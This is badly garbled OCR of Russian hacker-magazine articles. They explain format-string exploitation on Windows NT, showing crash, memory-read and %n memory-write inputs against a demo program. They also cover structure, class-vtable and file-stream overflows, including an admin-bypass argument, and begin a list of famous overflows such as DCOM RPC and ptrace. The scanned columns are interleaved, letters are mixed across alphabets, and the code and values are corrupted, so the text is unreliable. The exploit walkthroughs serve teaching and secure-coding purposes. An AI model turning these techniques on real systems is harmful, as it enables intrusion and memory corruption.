100 уязвимых приложений, а в 2003 - ретатором срорматного вывода по мо проанализировать состояние стека 
свыше 150! Атаке подверглись серве- своему усмотрению, вызывая ошибки на момент вызова рип (Би! оц), в 
До сих пор ра баз данных, вращающихся под доступа, читая и перезаписывая ячей- чем нам поможет отладчик, например 
ан Oracle, и сервисы UNIX, такие, как SYS- ки памяти и при благоприятных усло- TOT, который интегрирован в Microsoft 


одной атаки 
с помощью 
форматного 
ввода на 
приложения 
Windows 
NT. 


Для аварий- 
ного завер- 
шения прог- 
раммы дос- 
таточно 
вызвать на- 
рушение 
доступа, об- 
ратившись 
к невыде- 
ленной, не- 
существую- 
щей или 
заблокиро- 
ванной 
ячейке па- 
MATH. 


log или ftp. Hu одной атаки Ha прило- 
жения Windows МТ go сих nop He 3a- 
фиксировано. Это не значит, что 
Windows МТ лучше, просто графичес- 
кий интерорейс не располагает к ин- 
тенсивному использованию сформат- 
ного вывода, да и количество кон- 
сольных утилит под МТ очень невели- 
ко; в общем, нельзя считать, что он 
находится в безопасности. И сейчас 
ты в этом убедишься! 


ИСТОЧНИКИ УГРОЗЫ 

и Основных источников угрозы три: 
а) навязывание бажной программе 
собственных специсфикаторов; 6) 
врожденный дисбаланс специсфикато- 
ров; в) естественное переполнение 
буфера-приемника при отсутствии 
проверки на предельно допустимую 
длину строки. 


МЫ = 1 
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ХАКЕРСПЕЦ 


виях захватывая управление удален- 
ной системой. 


Рассмотрим следующий пример, к 
которому мы не раз будет обращаться 
в дальнейшем. 

f(){ 

char buf_in[32], Би оц 32]; 
printf("BBegu имя:"); gets(buf_in); 
sprintf(buf_out, "hello 1", buf_in); 
printf(buf_out); 


) 
) 


РЕАЛИЗАЦИЯ 00$ 

и Для аварийного завершения 
программы достаточно вызвать нару- 
шение доступа, обратившись к невы- 
деленной, несуществующей или заб- 
локированной ячейке памяти. Это лег- 
ко. Встретив спецификатор "%s", ин- 
терпретатор срорматного вывода изв- 
лекает из стека парный ему аргумент, 
трактуя его как указатель на строку. 
Если же тот отсутствует, интерпрета- 
тор хватает первый попавшийся ука- 
затель и начинает читать содержимое 
памяти по этому адресу до тех пор, по- 
ка не встретит нуль или не нарвется 
на запрещенную ячейку. Политика 
запретов варьируется от одной опе- 
рационной системы к другой, в част- 
ности, при обращении по адресам 
ООО0О000О0ОН - OOOOFFFFh и 7FFFOOOh 
- FFFFFFFFh Windows МТ всегда воз- 
буждает исключение. Остальные же 
адреса в зависимости от состояния 
кучи, стека и статической памяти мо- 
гут быть как доступными, так и нет. 

Откомпилируем пример, приведен- 
ный выше, и запустим его на выпол- 
нение. Вместо своего имени введем 


Visual Studio (см. скрин). 

Первым идет двойное слово 
OO12FF5Ch (на микропроцессорах ар- 
хитектуры Intel младший байт pacno- 
лагается по меньшему адресу, то есть 
все числа записываются в памяти в 
обратном порядке). Это указатель, со- 
ответствующий аргументу функции 
printf, которому, в свою очеребь, соот- 
ветствует буфер buf_out, содержа- 
щий непарный спецификатор "%s" и 
заставляющий функцию printf usBne- 
кать следующее двойное слово из 
стека, которое представляет собой 
обыкновенный мусор, оставленный 
предыдущей функцией. По стечению 
обстоятельств он (мусор и указатель 
одновременно) указывает на тот же 
самый buf_out, и потому нарушения 
доступа не происходит, зато слово 
"hello" выводится дважды. 

Будем рыть дальше, снимая со стека 
следующую последовательность ag- 
ресов: 00408000h (указатель на стро- 
ку "hello, Yos!\n"), OO12FF3Ch (указа- 
тель Ha buf_out), OO12FF3Ch (снова он), 
0040800Ch (указатель Ha строку 
"введи имя:"), 73257325h (содержимое 
буфера buf_in, трактуемое как указа- 
тель, между прочим указывающий на 
невыделенную ячейку памяти). 

Таким образом, первые пять специ- 
фикаторов "%s" проходят сквозь ин- 
терпретатор дформатного вывода 
вполне безболезненно, а вот шестой 
посылает его в космос. Процессор 
выбрасывает исключение, и выполне- 
ние программы аварийно прекращает- 
ся. Разумеется, спецификаторов не 
обязательно должно быть ровно 
шесть - GO остальных все равно не 
дойдет управление. 


Реакция программы Ha шесть спецификаторов "%s" 


Обрати внимание: Windows МТ при- 
водит именно тот адрес, который мы и 
ожидали. 


РЕАЛИЗАЦИЯ PEEK 

и Для просмотра содержимого па- 
мяти уязвимой программы можно вос- 
пользоваться спецификаторами 
"%X"", "%d" и "Yc". Спецификаторы 
"%X" и "%а" извлекают парное им 
двойное слово из стека и выводят его 
в шестнадцатеричном или десятичном 
виде соответственно. Спецификатор 
"%с" извлекает парное двойное сло- 
во из стека, преобразует его до одно- 
байтового типа char и выводит в сим- 
вольном виде, отсекая три старших 
байта. Таким образом, наиболее зна- 
чимыми из всех являются специофика- 
торы "%X" и "%с". 

Каждый спецификатор "%Х" отоб- 
ражает всего лишь одно двойное сло- 
во, лежащее в непосредственной бли- 
зости от вершины стека (точное рас- 
положение зависит от прототипа вы- 
зываемой функции). Соответственно, 
М спецификаторов отображают 4*М 
байт, а максимальная глубина прос- 
мотра равна 2*С, где С - предельно 


допустимый размер пользовательско- 
го ввода в байтах. Увы! Читать всю 
память уязвимого приложения нам 
никто не даст, отдавая на растерзание 
лишь крошечный кусочек, в котором, 
если повезет, могут встретиться сек- 
ретные данные (например, пароли) 
или указатели на них. Впрочем, узнать 
текущее положение указателя тоже 
неплохо. Но обо всем по порядку. 

Запустим нашу демонстрационную 
программу и введем спецификатор 
"%X". Она ответит: 


введи имя: %Х 
hello, 12FF5C! 


Откуда взялось 12FF5C? Обращаясь 
к дампу памяти, мы видим, что это - 
двойное слово, следующее за аргу- 
ментом buf_out и представляющее со- 
бой результат жизнедеятельности 
предыдущей функции, или, попросту 
говоря, мусор. Ну и какая нам радость 
от этого? Буфер содержит наш 
собственный ввод, в котором 3aBego- 
мо нет ничего интересного. Но это 
лишь часть айсберга. Как уже говори- 
лось в статье, посвященной перепол- 


ФУНКЦИИ, ПОДДЕРЖИВАЮЩИЕ ФОРМАТИРОВАННЫЙ 


ВЫВОД 


Ш Услугами интерпретатора форматного ввода/вывода пользуется 
множество функций, не только printf u не только в консольных прог- 


раммах. Графические 
приложения и сервер- 
ное программное обес- 


функция 
fprintf 


назначение 


ASCII форматированный вывод в 


печение, исполняю- МАЩИ 


UNICODE | Файл 


fscanf 


ASCII 


щееся под Windows 
fwscanf 


форматированный ввод с 


UNICODE | ПОоТока 


МТ, активно использу- 
printf 


ASCII форматированный вывод в 


ют функцию sprintf, 
wprintf 


UNICODE | stdout 


выводящую отформа- пи 


тированную строку в вт 


ASCII форматированный ввод с 
UNICODE. | Stdin 


оперативный буфер. тит 


ASCII форматированный вывод в 


_snwprintf 


UNICODE | буфер с ограничителем длины 


Перечисленные в таб- 


sprintf 


ASCII 


лице функции сами по 


swoprintf 


форматированный вывод в 


UNICODE | буфер 


sscanf 


себе He опасны. Onac- 


ASCII форматированный ввод из 


ными их делает нали- [RRS 


UNICODE | буфера 


чие пользовательско- М 


ASCII форматированный вывод в 


vfwprintf 


UNICODE | поток (stream) 


го BBOga в форматном 
vprintf 


ASCII форматированный вывод в 


аргументе. Именно та- - 
vwprintf 


UNICODE | stdout 


кие участки кода и _Узпрййн 


ASCII форматированный вывод в 


нужно искать при ис- 


_vsnwprintf 


UNICODE буфер с ограничителем длины 


следовании програм- 
мы на уязвимость. 


vsprintf 


форматированный вывод в 


ASCII буфер 


няющимся буферам, для передачи уп- 
равления на $Ве!-код необходимо 
знать его абсолютный адрес, который 
в большинстве случаев неизвестен, и 
спецификатор "%Х" как раз и выво- 
дит его на экран! 

Теперь введем несколько специфи- 
каторов "%Х", для удобства разделив 
их пробелами: 


введи имя: %X %X %X YX MX MX MX 
hello, 12FF5C 408000 12FF3C 12FF3C 40800C 
25205825 58252058! 


Обрати внимание на два последних 
двойных слова. Да это же содержи- 
мое буфера пользовательского вво- 
да! Ведь АС$!-строка "%Х " в шест- 
надцатеричном представлении выгля- 
дит как "25 58 20". 

Идея - сформировать указатель на 
интересующую нас ячейку памяти, по- 
ложить его в буфер, а затем натра- 
вить на него спецификатор "%5", чи- 
тающий память вплоть gO встречи с 
нулевым байтом или запрещенной 
ячейкой. Нулевой байт не помеха, 
достаточно сформировать новый ука- 
затель, расположенный за его хвос- 
том. Запрещенные ячейки намного ко- 
варнее - всякая попытка доступа к 
ним вызывает аварийное завершение 
программы, и, до тех пор пока админи- 
стратор не поднимет упавший сервер, 
атакующему придется скучать и пить 
пиво. А после перезапуска располо- 
жение уязвимых буфером данных мо- 
жет оказаться совсем иным, что обес- 
ценит все ранее полученные резуль- 
таты. Конечно, волков бояться - в лес 
не ходить, но и соваться в воду, не 
зная броду, тоже не стоит. В общем, 
со спецификатором "%5$" следует 
быть предельно осторожным, а то не- 
долго и DoS схлопотать. 

Допустим, мы хотим прочитать со- 
держимое памяти по адресу 
771F86669h (по ней можно определить 
версию операционной системы, так 
как у всех она разная). Расположение 
буфера пользовательского ввода нам 
уже известно - актуальные данные на- 
чинаются с шестого двойного слова 
(см. листинг). Остается подготовить бо- 
евую начинку. Вводим целевой адрес, 
записывая его в обратном порядке и 
набирая непечатные символы с по- 
мощью <ALT> и цифровой клавиатуры. 
Добавляем к ним шесть специсрикато- 
ров "%Х", "Yd" или "%с" (поскольку 
содержимое этих ячеек нас никак не 
волнует, подойдут любые). Добавляем 
опознавательный знак, например 
звездочку или двоеточие, за которым 
будет идти спецификатор вывода 
строки "%5". И, наконец, скармливаем 
полученный результат программе 
(опознавательный знак необходим 
для того, чтобы быстро определить, 
где кончается мусор, а где начинаются 
актуальные данные) 

Если перевести символы в строке 
после двоеточия в шестнадцатерич- 


ную форму, получится 8B 46 B3 40 ЗЕ у 


Если поль- 
зовательс- 
кий BBOg 
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строку фор- 
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форматного 
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своему ус- 
мотрению. 
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ЕРНИ PRINTF ЗА ХВОСТ) 


введи MMA: LE<ALT-248>wsct%tcscscsc: SS 
hello, if°w \ <<#:JF{ У! 


Просмотр дампа памяти по вручную сформированному указателю 


snprintf 
значитель- 
но безопас- 
Hee sprintf, 
так как 
контролиру- 
ет размер 
буфера- 
приемника и 
никогда не 
устроит пе- 
реполнение. 


Каждый специсфрикатор занимает два 
байта и снимает со стека четыре. 


B3 00. Откуда взялся нуль? Это ASIIZ- 
строка, и нуль служит ее завершите- 
лем. Если бы его здесь не оказалось, 
спецификатор "%s" вывел бы на эк- 
ран намного больше информации. 

Фактически мы реализовали аналог 
бейсик-функции peek, судьбоносность 
которой уже обсуждалась в другой 
статье, однако не спеши открывать на 
радостях пиво. Данная реализация 
peek'a очень ограничена в возможнос- 
TAX. Указатель, сформированный в на- 
чале буфера, не может содержать в 
себе символ нуля, а потому первые 
17 Мбайт адресного пространства не- 
доступны для просмотра. Указатель, 
сформированный в конце буфера, мо- 
жет указывать практически на любой 
адрес, поскольку старший байт адреса 
удачно совпадает с символом завер- 
шающего нуля, однако, чтобы дотя- 
нуться GO такого указателя, потребует- 
ся пересечь весь буфер целиком, а 
это не всегда возможно. 


Получилось! Мы сделали это! 
Действуя и дальше таким макаром, 
мы сможем просмотреть практически 
всю доступную память программы. 


РЕАЛИЗАЦИЯ РОКЕ 

и Спецификатор "%п" записывает в 
парный ему указатель количество вы- 
веденных на данный момент байт, тем 
самым позволяя нам модифициро- 
вать содержимое указателей по свое- 
му усмотрению. Обрати внимание: мо- 
дифицируется не сам указатель, а то, 
на что он указывает! 

Перед демонстрацией нам необходи- 
мо найти в стековом хламе подхосдя- 
щий указатель, предварительно про- 
читав его содержимое строкой типа 
"%Х %Х YX", как мы уже делали. Вы- 
берем 12FF3Ch, указатель на буфер 
пользовательского ввода buf_in. Что- 
бы его достать, нужно снять со стека 
два двойных слова; этим у нас займут- 
ся спецификаторы "%с%с". 


.data:004053B4 aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',O 


Модифици- 
руемая с 
помощью 
хитрости со 
специфика- 
тором 
"%п", 
ячейка 
должна при- 
надлежать 
странице с 
атрибутом 
PAGE_READ 
WRITE, B 
противном 
случае про- 
цесс сгене- 
рирует иск- 
лючение. 


Дизассемблер утверждает, что по 
адресу 004053B4h в нашей демон- 
страционной программе расположен 
копирайт фирмы Microsoft. 

Давай выведем его на экран. Как мы 
помним, начало буфера соответству- 
ет шестому спецификатору. Каждый 
спецификатор занимает два байта и 
снимает со стека четыре. Еще два 
байта уходят на спецификатор "%s", 
выводящий строку. Так сколько всего 
надо передать спецификаторов прог- 
рамме? Составляем простенькое ли- 
нейное уравнение и сходу решаем 
его, получая в ответе двенадцать. 
Одиннадцать из них выгребают со 
стека все лишнее, а двенадцатый вы- 
водит содержимое расположенного 
за ним указателя. 

Указатель формируется тривиаль- 
но: открываем А$С!-таблицу симво- 
лов (как вариант - запускаем HIEW) и 
переводим 4053B4h в символьное 
представление. Выворачиваем его на- 
изнанку и вводим в программу, при 
необходимости используя цифровую 
клавиатуру и клавишу <ALT> (см. 
скрин). 


Поскольку модификация буфера 
осуществляется после его вывода на 
экран, доказательства перезаписи па- 
мяти приходится добывать в отладчи- 
ке. Загрузив подопытную программу в 
Microsoft Visual Studio (или любой 
другой отладчик на твой вкус), уста- 
нови точку останова по адресу 
401000 (адрес функции тат) или, по- 
догнав к ней курсор (Ctri+G, Address, 
"401000", <Enter>), нажми Ctri+Fi0 для 
пропуска инструкций стартового кода, 
совершенно не интересующего нас в 
настоящий момент. 

Пошагово трассируя программу по 
[О (Step Over - трассировка без захо- 
да внутрь функций), введи заданную 
строку, когда тебя об этом попросят 
(экран консоли начнет призывно ми- 
гать) и продолжай трассировку 
вплоть gO достижения строки 
0040103Ch, вызывающей функцию 
printf. Теперь перейди в окно дампа 
памяти и введи в адресной строке 
"ESP", сообщая отладчику, что нам 
угодно просмотреть содержимое сте- 
ка, а затем вернись к дизассемблер- 
ному коду и нажми F10 еще раз. 

Содержимое буфера пользова- 
тельского ввода немедленно изме- 
нится, подсвечивая ядовито-красным 
цветом число "OF 00 00 00", запи- 
санное в его начале. Перезапись 
выбранной ячейки памяти успешно 
состоялась! 

Напоминаю, если спецификаторы 
перекрывают буфер пользовательс- 
кого ввода, мы можем самостоятель- 
но сформировать указатель, переза- 


Функция sprintf 


ОТНОСИТСЯ К ЧИСЛУ 


самых опасных. 


Теперь определимся с числом, кото- 
рое мы хотим записать. Записывать 
можно только маленькие числа - на 
большие просто не хватит размера 
буфера. Сойдемся на числе OFh (это 
нечетное число, четные приносят 
несчастье :). Считаем: два символа 
выводят спецификаторы, снимающие 
лишние двойные слова с верхушки 
стека, семь приходится на строку 
"hello, " (да-да, она тоже в доле), тог- 
да у нас остается: OFh - ОРВ - 07h = 
= 06h. Шесть символов, которые мы 
должны ввести самостоятельно. Они 
могут быть любыми, например, "qwer- 
фу" или что-то в этом роде. Остается 
добавить спецификатор "%п", и 
сформированную строку можно пере- 
дать программе: 


введи имя: qwerty%c%c%n 
hello, qwerty\ ! 


ввели MMADechckoicictcictcictctictatAlt-1590>s8 
helle, \ << "84508545 Mieroesoft Visual C++ Runtime Library Se | 


Формирование указателя в конце буфера и вывод его Ha экран 


2004 


08(45) 


писывая выбранные ячейки памяти 
произвольным образом. То есть поч- 
ти произвольным. К ограничениям 
выбора целевых адресов теперь еще 
присоединяются и ограничения выбо- 
ра перезаписываемого значения, ко- 
торые, между прочим, очень жестки. 


ДИСБАЛАНС 
СПЕЦИФИКАТОРОВ 

m= Каждому спецификатору должен 
соответствовать парный аргумент. Но 
должен еще не значит обязан. Ведь 
спецификаторы и аргументы програм- 
мисту приходится набивать вручную, 
иему ничего не стоит ошибиться! 
Транслятор откомпилирует такую 
программу вполне нормально, воз- 
можно, негромко выругавшись при 
этом и выдав на экран предупреждаю- 
щий warning. Но что произойдет по- 
TOM? 

Если аргументов окажется больше, 
чем спецификаторов, "лишние" будут 
проигнорированы. В противном слу- 
чае функция форматированного вы- 
вода, не зная сколько ей аргументов 
реально передали, снимет со стека 
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Демонстрация перезаписи ячейки памяти 


первый встретившийся ей мусор. События будут разви- 
ваться по сценарию, описанному выше ("Навязывание 
собственных спецификаторов"), с той лишь разницей, что 
навязывать спецификаторы злоумышленник сможет толь- 
ко косвенно или не сможет вовсе. 


ПЕРЕПОЛНЕНИЕ БУФЕРА-ПРИЕМНИКА 

и Функция рип относится к числу самых опасных, и 
все руководства по безопасности в один голос твердят, 
что лучше пользоваться ее безопасным аналогом - 
snprintf. Почему? Природа дформатированного вывода Ta- 
кова, что предельно достижимую длину результирующей 
строки очень трудно рассчитать заранее. Рассмотрим сле- 
дующий код: 


f() 

{ 

char buf[???]; 

sprintf(buf,"uma:%s возраст:%024 Bec:%03d poct:%03d\n", 
name, age, m, h); 


Как вы думаете, каких размеров буфер нам потребуется? 
Из неизвестных факторов здесь присутствуют: длина стро- 
ки name и "длина" целочисленных переменных age, т, h, 
преобразуемых функцией sprintf B символьное представ- 
ление. Кажется логичным, если мы отводим два столбца на 
возраст и по три на рост и вес, то за вычетом имени и дли- 
ны форматной строки нам потребуется всего 8 байт. Пра- 
BUNbHO? А воти нет! Если строковое представление пере- 
менных не умещается в отведенных ему позициях, оно ав- 
томатически расширяется, дабы избежать усечения ре- 
зультата. В действительности же, десятичное представле- 
ние 32-разрядных переменных типа int требует резервиро- 
вания 1 байт памяти, в противном случае возникает угроза 
переполнения буфера. 


ЗАКЛЮЧЕНИЕ 

и Ошибки обработки спецификаторов - частный случай 
проблемы интерполяции строк. Некоторые языки, напри- 
мер Perl, позволяют не только форматировать вывод, но 
и внедрять переменные и даже сфункции (!) непосред- 
ственно в саму выводимую строку, что существенно уп- 
рощает и ускоряет программирование. К сожалению, хо- 
рошие идеи становятся фундаментом воинствующего 
вандализма. Удобство не сочетается с безопасностью. 
Что удобно программировать - удобно и помать, хотя об- 
ратное утверждение неверно. 

В общем, не воспринимай языковые возможности как 
догму. Подходи к ним творчески, отбирая только лучшие 


функции и операторы. 
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BHO происходило переполнение, HO что перезаписывалось и как это влияло на дальнейшее исполнение программы, 
было загадкой. Что-то смутно напоминало ситуацию с выделением памяти в куче через функцию та{ос()... 


шибки переполнения 


буфера часто требуют 


от хакера проявить 


смекалку. Особенно это 
касается тех моментов, 
когда появляется необходимость в 
подделке каких-либо данных. Если ты 
сталкивался с переполнениями в ку- 
че, то понимаешь, о чем идет речь. В 
данной статье я приведу несколько 
примеров того, как эксплуатируются 
уязвимости, требующие фальсифика- 
ции структурированных участков па- 
мяти, и как этим может воспользо- 
ваться злоумышленник для исполне- 
ния своего кода. Поехали! 

Все данные в памяти представлены 
одинаково. Не имеет значения, с чем 
работает программа: со строками, чис- 
лами, структурами и T.g. Так или иначе, 
все данные - это набор байт onpege- 
ленной длины, и ничего более. Все ог- 
раничения в обработке созданы прог- 
раммистом, и они существуют только 
на уровне понимания кода. Если ты 
создаешь строку, то она в памяти ни- 
чем не отличается от массива чисел 
или координат какого-либо многоу- 
гольника. Другое дело - интерпрета- 
ция данных. Если это строка, то ты зна- 
ешь, что она должна заканчиваться 
нулем, если это координаты, то их ко- 
личество должно быть парным и т.д. 


ПРИМЕР 1. ПРОГРАММА ПРОВЕРКИ ИМЕНИ И ПАРОЛЯ 


struct credentials { char пате[0х10]; char pass[Ox10]; 
bool admin; }; 
void CheckUser(credentials* cUser) { 

if(!strcmp(cUser->name,"adm") && !stremp(cUser->pass,"adm") ) 
cUser->admin = true; } 
int _tmain(int argc, TCHAR* argv[]) { 
credentials* cUser = new credentials; 


cUser->admin = false; char* name = argv[i]; 


char* pass = argv[2]; 


memcpy( cUser->name, name, strlen(name) ); 
тетсру( cUser->pass, pass, strlen(pass) ); 


cUser->name[strlen(name)] = '\O'; 


cUser->pass[strlen(pass)] = '\O'; 
CheckUser(cUser); 


return O; } 


ПЕРЕПОЛНЕНИЕ СТРУКТУР 

и При переполнении буфера xa- 
кер имеет дело, в основном, со 
строками, и единственное ограни- 
чение, которое накладывается на 
shell-Kog, - это отсутствие в нем ну- 
левых байтов. Но бывают ситуа- 
ции, когда переполнение происхо- 
дит в обработке строки, которая 
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является частью структуры. Давай 
взглянем на пример 1. 

Это программа, которая проверяет 
имя пользователя и пароль. Если они 
совпадают и равны "adm" - пользова- 
тель считается администратором, ес- 
ли не совпадают - гостем. Сразу мож- 
но заметить, что для заполнения 
структуры credentials используется 
команда memcpy без проверки на 
длину передаваемых данных. Этим 
можно воспользоваться, чтобы пере- 
записать память приложения и, воз- 
можно, получить управление над ним. 
Чтобы подтвердить теорию, нужно по- 
играть с передаваемыми приложению 
данными. Если запустить программу с 
параметрами "demo demo", она ска- 
жет, что ты являешься гостем, "адт 
adm" - вернет, что ты админ. Кажется, 
все в порядке, но не стоит забывать о 
переполнении! Передай приложению 
строку: hacker аааааааааааааааа\хО1, и 
она опознает тебя как администрато- 
ра. Причина такого поведения ясна - 
передавая длинный пароль, ты пере- 
записываешь значение переменной 
admin, и именно она хранит в себе 
твой статус в системе. Если перепол- 
нения не происходит, переменная 
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По сути, переполнение структур ничем 
не отличается от переполнений строк. 


admin равна нулю, но поскольку ты 
передал пароль из 16 символов "а" и 
одного байта "ОхО\", а размер пере- 
менной pass - всего 16, то "ОхО1" пере- 
запишет значение admin и система 
сочтет тебя администратором. 


ПЕРЕПОЛНЕНИЕ КЛАССОВ 

m Все сказанное касается также и 
классов. Возьмем предыдущий при- 
мер, но на этот раз все данные будут 
храниться не в структуре, а в классе. 
Более того, пусть теперь можно будет 
указать данные не для одного, а для 
двух пользователей. 

Давай опять проверим работу полу- 
чившегося приложения, которое так- 
же чувствительно к длине передавае- 
мых ему строк. Приложение работает 
корректно, если длина строки не пре- 
вышает 16 символов; если нарушить 
это правило, то перед вами откроются 
другие возможности, совсем не пре- 
дусмотренные программистом :-). Так, 
например, при передаче в качестве 
пароля gna первого пользователя 
строку из 30 байт приложение крити- 
чески завершит свою работу. 

Причина происшедшего в том, что 
для хранения класса используется 
динамическая память. Переполняя 
буфер, ты можешь изменить значе- 
ния статических переменных, это 
верно, но ошибка не из-за этого. 
Посмотри на отладочную информа- 
цию. Видно, что после того как пер- 
вый экземпляр класса получил логин 
и пароль, у второго изменилось зна- 
чение VTable. А VTable - это адрес 
таблицы методов класса. В ней нахо- 
дятся все методы, помеченные как 
виртуальные, а все остальные нахо- 
дятся в сегменте кода. Адрес этой 


таблицы хранится по указателю объ- 
екта, а поскольку они создаются в 
стеке, то адрес таблицы лежит там 
же. Но на самом деле все просто: 
функции хранятся в области кода, 
переменные фиксированной длины 
лежат в той же области памяти, где 
расположен сам объект. Чтобы пере- 
записать область кода, необходимо 
копировать буфер очень большей 
длины, и поэтому, даже если есть 
возможность записи в сегмент кода, 
ей не всегда можно воспользоваться 
из-за расстояния от него до стека 
или кучи. Однако для большей гиб- 
кости и реализации наследования 
программисты используют виртуаль- 
ные сфункции. Они ничем не отлича- 
ются от обычных за исключением ме- 
Toga доступа к ним. Если точнее, ag- 
рес функции не жестко прописан в 
коде, а находится в таблице, которая 
может меняться в ходе выполнения 
программы. Адрес таблицы хранится 
в первых 4 байтах объекта, а поэто- 
му, если есть переполнение, то его 
можно перезаписать. Именно это и 
произошло в рассмотренном приме- 
ре. Когда ты передал строку "пате 
ААААААААААААААААААААААААА 
АААААААААААА name pass", па- 
роль, хранящийся в первом экземп- 
ляре, перезаписал виртуальную 
таблицу методов второго. Чтобы в 
этой ситуации получить контроль 
над приложением, необходимо най- 
ти такой адрес в памяти, который 
не содержит в себе нулей и указы- 
вает на адрес, по которому находит- 
ся твой Shell-Kog. Надеюсь, теперь 
тебе понятно, в чем дело. Сущест- 
вует еще множество методов пере- 
полнения объектов в памяти, но эта 
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ЕТ основы | ломлем стрУКТУРЫ ) 


тема заслуживает отдельного рас- 
смотрения, а пока что мы остано- 
вимся на переполнении структури- 
рованных данных. 


ПЕРЕПОЛНЕНИЕ 
ФАЙЛОВОГО ПОТОКА 
Взглянем на пример 2. 

Если ты внимательно изучил преды- 
дущий пример, то, наверно, заметил, 
что в нем используется небезопас- 
ная функция strcpy(), которая, как из- 
вестно, может привести к перезаписи 
памяти, что, собственно, и произош- 
ло. Осталось только разобраться, как 
ведет себя приложение после пере- 
полнения. Если передать сфункции 
строки длиной меньше 255, она кор- 
ректно выполнит и без проблем за- 
вершит свою работу. Но, если ей пе- 
редать в качестве параметра строку 
из букв "А" длиной 255+8, она, вмес- 
то того чтобы записать в файл строку 
"File created successful", запишет 
"AAAAA". Более того, если передать 
строку длиной хотя бы 255+255, то 
функция просто аварийно завершит 
свою работу. Давай посмотрим вни- 
мательнее, что происходит. Касатель- 
но записи в файл строки "ААААА", то 
причина в том, что, переполняя пере- 
менную SzUserName, ты перезаписы- 
ваешь значение переменной 
szHeader. А если увеличить размер 
передаваемой строки, то в результа- 
те будет перезаписан указатель на 
qpann. Что это нам дает? Все очень 
просто. Если раньше программа вве- 
ла логин в защищенном срайле, то те- 
перь ты можешь перенаправить ее 
вывод в любой другой файл или на 
стандартные потоки stdout или srderr! 
Для этого необходимо просто переза- 
писать указатель на файл на какой- 
либо другой указатель, который ссы- 
лается на поддельную структуру 
файла. Но и это еще не все! Раз есть 
возможность подделки потока, то 
можно его заставить перезаписать 
любой участок памяти нужными дан- 
ными, даже в том случае, когда раз- 
мер переполняемого буфера такой 
маленький, как в последнем примере. 
Технология осуществления данной 
идеи проста. Перед тем как происхо- 
дит запись данных в файл, они про- 
ходят буферизацию. Адрес буфера 
указан в самой структуре потока: 


И если их выставить в интересую- 
щие тебя адреса, то при записи в 
файл данные перезапишут собой 
нужные фрагменты памяти. Воссоз- 
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ПРИМЕР 2. ПСЕВДОФУНКЦИЯ ДОЗАПИСИ ФАЙЛА 


дать все это достаточно сложно из-за 
реализации системы работы с файла- 
ми. Куда более верным решением яв- 
ляется перезапись массива _stdbuf . 
Перезаписывая срайловые потоки, не- 
обязательно пытаться пользоваться 
ими для передачи управления на 
shell-kog. Если длина буфера позво- 
ляет перезаписать просто адрес возв- 
рата, то нужно использовать предос- 
тавленную возможность. Но при этом 
корректно перезаписать указатель на 
файл, чтобы дать функции успешно 
завершить свою работу. 


ARE YOU MIND OVERFLOWS? 
На этом завершим небольшой экс- 
курс в технологии перезаписи структу- 


рированных данных, хотя говорить о та- 
ких уязвимостях можно очень долго. Ос- 
новное, что ты должен вынести из этой 
статьи, - это то, что, по сути, переполне- 
ние структур ничем не отличается от пе- 
реполнений строк. Они просто требуют 
от атакующего более точных знаний о 
работе программы, но зато взамен за- 
частую дают более простые способы 
для передачи управления на $Пе!-код. 
Напоследок хотелось бы напомнить, 
что статья рассчитана на программис- 
тов, которые решили повысить уро- 
вень безопасности в своих приложе- 
ниях. Все, о чем ты прочитал, носит 
только информативный характер и не 
должно быть использовано в неза- 


конных целях. 
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бимом сайте 
www.xakep.ru. 


Bar ptrace() 
охватывает 
большое 
число ядер 
в ветках 
2.2, 2.4 и 
2.6. 


ми. Баг приводил к полному имперсо- 
нированию системы с правами "SYS- 
ТЕМ". 16 июля, в день обнаружения 
уязвимости, на сайте |510! появилась 
информация о загадочном перепол- 
нении. Что интересно, суть ошибки 
никто раскрывать не собирался. Гово- 
рилось лишь о том, что в коде форто- 
чек юзается некорректное обращение 
к интерфейсу __RemoteGetClassObject, 
которое может подменить именован- 
ный канал ертаррег. Несколько дней 
спустя, когда MS выложила все необ- 
ходимые патчи, команда Xfocus раск- 
рыла миру суть уязвимости в RPC, 
причем оказалось, что Винда имела 
не одну, а две бреши - локальную и 
удаленную. Когда происходил покаль- 
ный запрос к АР|-функции 
CoGetInstanceFromFile(), контроль Hag 
параметром, отвечающий за длину 
файла, не производился. При удален- 
ном обращении длина строго контро- 
лировалась. Если же заюзать КРС, то 
нетрудно составить запрос вида 
"\\servername\cS\itsverylongfilename.t 
xt", который Mor бы привести к пере- 
полнению буфера. 

Но здесь не все так гладко, как ка- 
жется на первый взгляд. Для того 
чтобы передать аргумент API-cpyHk- 
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Подобное переполнение юзалось 
вирмейкерами в детище msblast. Этот 
чудесный червь сумел попасть в ты- 
сячи машин и совершить глобальную 
атаку на windowsupdate.com. 


©. Ptrace stack overflow 
in kernel 

По цифрой два выступает брешь в 
линуксовом ядре. Конечно, она имеет 
лишь локальный характер стекового 
переполнения, но ошибку содержат 
практически все ветки ядер 2.2 и 2.4. 

Так же, как и в случае с DCOM, ник- 
то не собирался раскрывать суть 
уязвимости. В багтраке говорилось, 
что ptrace() содержит компрометиру- 
ющую уязвимость, ведущую к ло- 
кальному руту. Однако через нес- 
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L 
= ремя от времени мир узнает о потрясной уязвимости в каком-нибудь юзабельном продукте. Ущерб от бага может 
a составлять от нескольких миллионов gO миллиарда зеленых президентов, хотя уязвимость представляет собой He 
что иное, как простое переполнение буфера. 
ч 
Бесспорно, что даже ции, требуется подменить "\\server- колько дней некий Анджей Шомбе- 
самый очевидный баг пате" на что-либо другое (изначаль- рски из Польши посчитал своим gon- 
можно узреть только но это имя машины, к которой осуще- гом раскрыть подробности этой уяз- 
после длительного тес- ствляется реквест). Кроме того, необ- вимости. Удачное переполнение воз- 
тирования продукта. ходимо учесть, что $Пе!-код не дол- можно, если: 
Самый талантливый программист - и жен иметь определенных символов, - ядро собрано с поддержкой nogk- 
тот не в состоянии проконтролиро- по которым происходит проверка в лючения внешних модулей; 
вать длину и корректность всех пере- функции GetMachineName(). Это реа- - в кернеле доступно использование 
менных в своем коде. Как правило, лизуется с помощью специально по- функции рЁгасе(); 
этим занимаются багоискатели, стара- добранных адресов возврата. Они за- - загрузчик модулей доступен и на 
тельно изучая исходники подозри- висят от версии операционной систе- него стоит ссылка в /proc/sys/ker- 
тельного приложения. мы, и, если они сгенерированы невер- nel/modprobe. 
HO, RPC-cepBUC аварийно завершит Допустим, что все три условия вы- 
Позволь представить тебе 10 хито- работу. полняются (в 99% случаев это так и 
вых переполнений, которые имели Бьюсь об заклад, что ты баловался есть). Зная, что кернел сам изменяет 
